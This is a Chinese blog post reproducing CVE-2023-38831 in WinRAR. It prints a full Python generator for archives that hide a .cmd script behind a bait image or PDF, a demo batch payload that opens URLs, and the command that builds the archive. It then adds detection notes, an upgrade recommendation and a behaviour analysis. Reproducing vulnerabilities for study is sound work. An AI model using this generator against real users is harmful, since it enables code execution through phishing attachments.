CVE-2023-38831 winrar漏洞复现

已于 2024-09-12 12:55:55 修改
阅读量376 收藏 10
点赞数 5
文章标签: 安全 web安全 winrar 网络安全
于 2024-09-12 10:35:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46624929/article/details/142167238
版权

漏洞原理

1.WinRAR 0day漏洞允许攻击者创建恶意 .RAR 和 .ZIP 存档,这些存档显示看似无害的诱饵文件,例如 JPG (.jpg) 图像、文本文件 (.txt) 或 PDF (.pdf),用户双击使用winRAR打开查看压缩文件,并在winRAR窗口中点击查看时触发漏洞 。

2.影响版本:WinRar 版本 < 6.23

漏洞复现环境搭建

由于winrar官网找不到6.23之前的版本所以使用了GitHub上其它的WinRAR备份

GitHub - n2far2000/winrarsc: WinRAR Official Release (Simplified Chinese)

漏洞复现流程

1.github等相关POC可以直接下载

import shutil
import os, sys
from os.path import join
TEMPLATE_NAME = "TEMPLATE"
OUTPUT_NAME = "CVE-2023-38831-poc.rar"
 
BAIT_NAME = "CLASSIFIED_DOCUMENTS.pdf"
SCRIPT_NAME = "script.bat"
 
if len(sys.argv) > 3:
    BAIT_NAME = os.path.basename(sys.argv[1])
    SCRIPT_NAME = os.path.basename(sys.argv[2])
    OUTPUT_NAME = os.path.basename(sys.argv[3])
elif len(sys.argv) == 2 and sys.argv[1] == "poc":
    pass
else:
    print("""Usage:
          python .\cve-2023-38831-exp-gen.py poc
          python .\cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")
    sys.exit()
 
BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")
 
print("BAIT_NAME:", BAIT_NAME)
print("SCRIPT_NAME:", SCRIPT_NAME)
print("OUTPUT_NAME:", OUTPUT_NAME)
 
if os.path.exists(TEMPLATE_NAME):
    shutil.rmtree(TEMPLATE_NAME)
os.mkdir(TEMPLATE_NAME)
d = join(TEMPLATE_NAME, BAIT_NAME + "A")
if not os.path.exists(d):
    os.mkdir(d)
 
shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))
shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))
 
# if os.path.exists(OUTPUT_NAME):
#     print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))
#     sys.exit()
 
shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)
 
with open(TEMPLATE_NAME + ".zip", "rb") as f:
    content = f.read()
    content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")
    content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")
 
os.remove(TEMPLATE_NAME + ".zip")
 
with open(OUTPUT_NAME, "wb")  as f:
    f.write(content)
 
print("ok..")

2.poc使用需要三个参数,分别为诱导文件,可以是图片或者pdf,诱使被害者点击文件,文件执行的脚本,生成的压缩包名,需要创建好诱导文件和脚本。

3.编写执行脚本,创建好诱导文件test.bmp,脚本文件script.bat

@echo off
start "" "https://ys.mihoyo.com/"
start "" "https://ys-api.mihoyo.com/event/download_porter/link/ys_cn/official/pc_default

4.打开cmd输入:

python .\cve-2023-38831-exp-gen.py test.bmp script.bat poc.rar

5.点击诱导文件

6.成功执行bat文件内容

漏洞特征

CVE-2023-38831的利用过程全程不出网,易出现在钓鱼邮件附件中,无法从抓包看出流量特征,但是文件会执行.bat文件,通过行为和bat文件内容,如果使用EDR,火绒,等终端安全设备是可以成功拦截的。

漏洞修复建议

升级WinRar 版本 > 6.24

行为分析

 使用微软官方下载的Process Monitor进行行为分析 WinRAR 进程会向如下 Temp 中的目录创建两个文件分别是“test.bmp”,"test.bmp.cmd"都是用QueryDirectory 函数进行查询

执行 cmd.exe 的操作同样是 WinRAR.exe 进程创建的,调用 SHELL32.dll库,通过 ShellExecuteW 创建

参考文章:WinRAR漏洞复现(CVE-2023-38831)-CSDN博客

WinRAR 0day漏洞CVE-2023-38831复现最详解 - FreeBuf网络安全行业门户

GitHub - BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc: lazy way to create CVE-2023-38831 winrar file for testing

神里流太刀术真传-神里绫华
关注
漏洞复现RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)
做自己喜欢的事,并将其发挥到极致!
09-11 992
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RARWindows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。
WinRAR CVE-2023-40477代码执行漏洞复现
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
10-25 347
WinRAR6.117z 23.01受影响版本。
漏洞复现CVE-2023-38831 WinRAR代码执行漏洞
信安百科
08-28 325
WinRAR版本6.23之前存在可欺骗文件扩展名的漏洞,可利用该漏洞创建恶意RAR或ZIP存档,这些存档中显示看似无害的诱饵文件,例如 JPG (.jpg) 图像文件、文本文件 (.txt) 或 PDF文档 (.pdf)等文件,以及与文件同名的文件夹(包括文件扩展名),当用户打开这些文件时,将执行文件夹中的恶意脚本,导致在设备上安装恶意软件。
Asun安全学习【漏洞复现CVE-2023-38831 WinRAR代码执行漏洞
m0_64993865的博客
07-08 1156
学习!!!!!
WinRAR CVE-2023-38831简单复现
潇湘信安的博客
09-18 344
CVE-2023-38831漏洞2023 年 4 月至 2023 年 8 月期间在野外被利用。当用户尝试查看 ZIP 存档中的良性文件时,WinRAR 6.23之前的版本允许攻击者执行任意代码。出现此问题的原因是 ZIP 存档可能包含良性文件(例如普通 .JPG 文件)以及与良性文件同名的文件夹,并且处理该文件夹的内容(可能包括可执行内容)在尝试仅访问良性文件期间。
CVE漏洞复现-CVE-2023-38831 WinRAR代码执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
10-27 1598
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RARWindows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。
CVE-2023-38831(Winrar RCE)漏洞复现与分析
m0_55994898的博客
12-10 2510
本文对Winrar RCE漏洞(CVE-2023-38831)进行复现以及原理分析,对攻击过程进行还原,让你更直观的感受此漏洞的攻击面。对于Reverse本人并不擅长,所以此篇文章参考了很多互联网公开的对此漏洞的研究分析报告,文末标注。
WinRAR 代码执行漏洞RCE (CVE-2023-38831)-资源包
09-11
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RARWindows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,...RARLabs WinRAR 6.23之前版本存在安全漏洞,攻击者利用该漏洞可以执行任意代码。
WinRAR 0day CVE-2023-38831分析复现及poc
yuanlirong22的专栏
08-27 2393
最近WinRARCVE-2023-38831 漏洞被在野利用POC已可使用。漏洞影响版本:WinRa
WinRAR代码执行漏洞(CVE-2023-38831)
qq_42751192的博客
08-29 556
WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码。
CVE-2023-38831漏洞复现过程(Winrar漏洞
weixin_47948655的博客
10-08 383
CVE-2023-38831漏洞复现过程(Winrar漏洞
WinRAR 0day漏洞CVE-2023-38831复现最详解
weixin_45971758的博客
08-28 1731
WinRARCVE-2023-38831 漏洞被在野利用来攻击交易类的个人用户。影响版本:WinRar 版本 < 6.23。
CVE-2023-33246命令执行复现分析
蚁景网安学院
06-16 758
简介RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。既可为分布式应用系统提供异步解耦和削峰填谷的能力,同时也具备互联网应用所需的海量消息堆积、高吞吐、可靠重试等特性。影响版本<=RocketMQ 5.1.0<=RocketMQ 4.9.5环境搭建dockerpullapache/rocketmq:4.9.4root@ubuntu:/home/ubuntu/D...
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 1141
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 656
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 1247
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
安全服务面试
m0_74402888的博客
09-28 564
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
利用CVE-2023-38831漏洞攻击WinRAR的Metasploit模块
MSF_EXPLOIT-WINDOWS-FILEFORMAT-WINRAR_CVE_2023_38831-.txt 涉及到一个针对WinRAR软件的严重安全漏洞,该漏洞被标记为CVE-2023-38831。这个漏洞允许攻击者通过构造恶意的RAR文件来实现远程代码执行。以下是关于这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值